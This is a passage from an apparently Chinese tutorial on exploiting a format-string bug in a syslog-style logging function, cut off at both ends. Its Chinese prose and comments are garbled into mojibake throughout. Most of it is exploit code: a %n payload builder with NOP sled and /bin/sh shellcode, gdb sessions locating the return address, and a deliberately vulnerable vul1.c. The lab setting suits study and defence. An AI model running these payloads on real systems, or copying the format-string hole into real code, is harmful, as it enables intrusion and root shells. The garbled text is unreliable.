聽(tīng) buff[i+1] = (retloc & 0x0000ff00) >> 8;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) buff[i+2] = (retloc & 0x00ff0000) >> 16;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) buff[i+3] = (retloc & 0xff000000) >> 24;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)
聽(tīng) ptr = buff + i + 4;
聽(tīng) for(i = 0 ; i < 4 ; i++ )聽(tīng) //瀛樻斁%.10u%.10u%.10u%.10u
聽(tīng)聽(tīng)聽(tīng) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) memcpy(ptr, "%.10u", 5);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) ptr += 5;
聽(tīng)聽(tīng)聽(tīng) }
/* 瀛樻斁"%.SHELL_ADDRu%n",涓轟簡(jiǎn)浣挎樉紺烘婚暱搴︾瓑浜巗hell_addr,
聽(tīng) * 鎴戜滑鍑忓幓4涓?.10u鐨勯暱搴?4*10,鍐嶅噺鍘?argv[1] = xxRETloc"鐨勯暱搴︼細(xì)12+4
聽(tīng) * 灝嗚繖涓暱搴︿綔涓虹5涓?u鐨勫搴﹀悸?tīng)聽(tīng)?
聽(tīng) */聽(tīng)
sprintf(ptr, "%%.%uu%%n", shell_addr - 4*10 - 16);

聽(tīng) ptr = egg;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) *(ptr++) = NOP;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) for (i = 0; i < strlen(shellcode); i++)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng) *(ptr++) = shellcode[i];聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) buff[bsize - 1] = '\0';聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) egg[eggsize - 1] = '\0';聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) memcpy(egg, "EGG=", 4);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) env[0] = egg ;
聽(tīng) env[1] = (char *)0 ;

聽(tīng) execle("./vul","vul",buff,NULL,env);聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
}聽(tīng) /* end of main */聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)

<- end ->聽(tīng)

娉ㄦ剰錛氬湪鎴戜滑鐨勭▼搴忛噷錛屾垜浠疄闄呬嬌鐢ㄧ殑妯″紡鏄細(xì)

AA|RETloc|%.10u%.10u%.10u%.10u%.(shell_addr-4*10-16)u|%n

閫夌敤%.10u鐨勫師鍥犳槸錛氬鏋滅敤"%.nu"鏉ユ樉紺轟竴涓暟鍊肩殑鏃跺欙紝鑻ユ暟鍊奸暱搴﹀ぇ浜巒,鍒欎粛鐒朵細(xì)
鏄劇ず瀹為檯鐨勯暱搴︼紝鑰屼笉浼?xì)鎴柇湄?fù)n銆傚彧鏈夊湪鏁板奸暱搴﹀皬浜巒鏃訛紝鎵嶄細(xì)鍦ㄦ暟鍊煎墠闈㈣ˉ'0'浣挎樉
紺洪暱搴﹁揪鍒皀.鑰屼竴涓洓瀛楄妭鐨勬棤絎﹀彿鏁存暟錛屾渶澶т負(fù)0xffffffff = 4294967295錛屽叾闀垮害涔?br />灝辨槸10,鍥犳錛屼嬌鐢?.10u灝嗕繚璇佹樉紺洪暱搴︾殑綺劇‘(鑲畾涓?0).鐜板湪鍞竴瑕佺‘瀹氱殑灝辨槸
RETloc,涔熷氨鏄痬ain()鐨勮繑鍥炲湴鍧浜?jiǎn)銆傝繖涔熷緢綆鍗曪細(xì)

[root@rh62 /root]# ./x 0x41414141
Usages: ./x <RETloc> <offset> <align> <buffsize> <eggsize>
Using Ret location address: 0x41414141
Using Shellcode address: 0xbffffb08

Segmentation fault (core dumped)
[root@rh62 /root]# gdb ./vul core
GNU gdb 19991004
<....>
#0聽(tīng) 0x400622b7 in _IO_vfprintf (s=0xbfffedc4,
聽(tīng)聽(tīng)聽(tīng) format=0xbffff2d8 "argv[1] = AAAAAA%.10u%.10u%.10u%.10u%.3221224144u%n",
聽(tīng)聽(tīng)聽(tīng) ap=0xbffff2e8) at vfprintf.c:1212
1212聽(tīng)聽(tīng)聽(tīng) vfprintf.c: No such file or directory.
(gdb) bt聽(tīng)
#0聽(tīng) 0x400622b7 in _IO_vfprintf (s=0xbfffedc4,
聽(tīng)聽(tīng)聽(tīng) format=0xbffff2d8 "argv[1] = AAAAAA%.10u%.10u%.10u%.10u%.3221224144u%n",
聽(tīng)聽(tīng)聽(tīng) ap=0xbffff2e8) at vfprintf.c:1212
#1聽(tīng) 0x40070716 in _IO_vsnprintf (
聽(tīng)聽(tīng)聽(tīng) string=0xbfffeec0 "argv[1] = AAAAAA00000000020000000001198649097705429783951094787133", maxlen=1023,
聽(tīng)聽(tīng)聽(tīng) format=0xbffff2d8 "argv[1] = AAAAAA%.10u%.10u%.10u%.10u%.3221224144u%n",
聽(tīng)聽(tīng)聽(tīng) args=0xbffff2d0) at vsnprintf.c:129
#2聽(tīng) 0x80484de in log (level=1,
聽(tīng)聽(tīng)聽(tīng) fmt=0xbffff2d8 "argv[1] = AAAAAA%.10u%.10u%.10u%.10u%.3221224144u%n")
聽(tīng)聽(tīng)聽(tīng) at vul.c:13
#3聽(tīng) 0x8048589 in main (argc=2, argv=0xbffff724) at vul.c:33
(gdb) i f 3聽(tīng) -----> 鏌ョ湅main()鐨勬爤甯?br />Stack frame at 0xbffff6d8:
eip = 0x8048589 in main (vul.c:33); saved eip 0x400349cb
caller of frame at 0xbffff2c0
source language c.
Arglist at 0xbffff6d8, args: argc=2, argv=0xbffff724
Locals at 0xbffff6d8, Previous frame's sp is 0x0
Saved registers:
聽(tīng) ebp at 0xbffff6d8, eip at 0xbffff6dc聽(tīng) ----> OK,瀛樻斁eip鐨勫湴鍧鏄?xbffff6dc
(gdb)

濂界殑錛屾棦鐒剁幇鍦ㄦ垜浠凡緇忕煡閬撲簡(jiǎn)RETloc鐨勫湴鍧錛屽氨璁╂垜浠繍琛屼竴涓嬫垜浠殑鏀誨嚮紼嬪簭鐪嬬湅鍚э細(xì)
[root@rh62 /root]# ./x 0xbffff6dc
Usages: ./x <RETloc> <offset> <align> <buffsize> <eggsize>
Using Ret location address: 0xbffff6dc
Using Shellcode address: 0xbffffb08

argv[1] = AA鑽燂5?.10u%.10u%.10u%.10u%.3221224144u%n
Segmentation fault (core dumped)
[root@rh62 /root]# gdb ./vul core
<....>
#0聽(tīng) 0x42 in ?? ()
(gdb) bt
#0聽(tīng) 0x42 in ?? ()
(gdb) x/x 0xbffff6dc
0xbffff6dc:聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0x00000042
(gdb)

寰堝彲鎯滐紝騫舵病鏈夌湅鍒頒護(hù)浜烘縺鍔ㄧ殑#鍙鋒彁紺虹銆傜湅璧鋒潵0xbffffb08鐨勯暱搴︿笉鑳借姝g‘鐨勬墦鍗板嚭鏉ワ紝
鏍規(guī)嵁?huà)箣璇曞Q岃嚦灝戝ぇ浜?x90000000鐨勯暱搴﹂兘涓嶈兘姝g‘鏄劇ず錛屽叿浣撳師鍥犺繕鏈夊緟鐮旂┒銆傛劅鍏磋叮鐨勮鑰?br />鍙互鑷鍒嗘瀽涓涓嬨備負(fù)浜?jiǎn)寰楀堫C竴涓彲浠ュ伐浣滅殑鐗堟湰錛屾垜浠敼鍔ㄤ竴涓媣ul.c鍜宔xp.c:

<- begin ->聽(tīng) vul1.c

#include <stdarg.h>
#include <unistd.h>
#include <syslog.h>

#define BUFSIZE 1024

char egg[BUFSIZE];

int log(int level, char *fmt,...)
{
聽(tīng)聽(tīng) char buf[BUFSIZE];
聽(tīng)聽(tīng) va_list ap;
聽(tīng)
聽(tīng)聽(tīng) va_start(ap, fmt);
聽(tīng)聽(tīng) vsnprintf(buf, sizeof(buf)-1, fmt, ap);
聽(tīng)聽(tīng) buf[BUFSIZE-1] = '\0';
聽(tīng)聽(tīng) syslog(level, "[hmm]: %s", buf);
聽(tīng)聽(tīng) va_end(ap);
}


int main(int argc, char **argv)
{

聽(tīng) char buf[BUFSIZE];
聽(tīng) int i,num;
聽(tīng)
聽(tīng) if(getenv("EGG")) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng) /* 鎴戜滑灝嗙幆澧僂GG鐨勫唴瀹瑰鍒跺埌涓涓叏灞buffer閲岋紝
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) * 鑰岃繖涓猙uffer鐨勮搗濮嬪湴鍧鏄?x80xxxxx,瀹冨彲浠ヨ姝g‘鏄劇ず
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) */
聽(tīng)聽(tīng)聽(tīng)聽(tīng) strncpy(egg, getenv("EGG"), BUFSIZE-1);
聽(tīng)聽(tīng)聽(tīng)聽(tīng) egg[BUFSIZE-1] = '\0';
聽(tīng) }
聽(tīng) num = argc ;
聽(tīng) if(argc > 1) {
聽(tīng)聽(tīng)聽(tīng) for ( i = 1 ; i < num ; i ++ ) {
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) snprintf(buf, BUFSIZE -1 , "argv[%d] = %.200s", i, argv[i]);
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) buf[BUFSIZE-1] = '\0';
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) log(LOG_ALERT, buf);聽(tīng) // 榪欓噷鏈夐棶棰?br />聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) printf("argv[%d] = %s \n", i, argv[i]);
聽(tīng)聽(tīng)聽(tīng) }
聽(tīng) }
}

<- end ->聽(tīng)

<- begin ->聽(tīng) exp1.c

#include <stdlib.h>聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#include <unistd.h>聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_ALIGNMENT聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 2聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_RETLOC聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0xbffffadc聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_SHELLADDR聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0x8049800聽(tīng)聽(tīng) //鎴戜滑鐨剆hellcode鍦板潃鍦℉eap/BSS孌德?tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)?
#define DEFAULT_BUFFER_SIZE聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 512聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define DEFAULT_EGG_SIZE聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 1024聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
#define NOP聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng) 0x90聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
char shellcode[] =聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
聽(tīng) "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
聽(tīng) "\x80\xe8\xdc\xff\xff\xff/bin/sh";

聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
unsigned long get_esp(void) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng) __asm__("movl %esp,%eax");聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
}聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
main(int argc, char *argv[]) {聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) char *buff, *ptr, *egg;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) char *env[2];
聽(tīng) long retloc = DEFAULT_RETLOC;
聽(tīng) long shell_addr = DEFAULT_SHELLADDR;

聽(tīng) int align = DEFAULT_ALIGNMENT;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int bsize = DEFAULT_BUFFER_SIZE, eggsize = DEFAULT_EGG_SIZE;聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)聽(tīng)
聽(tīng) int i;
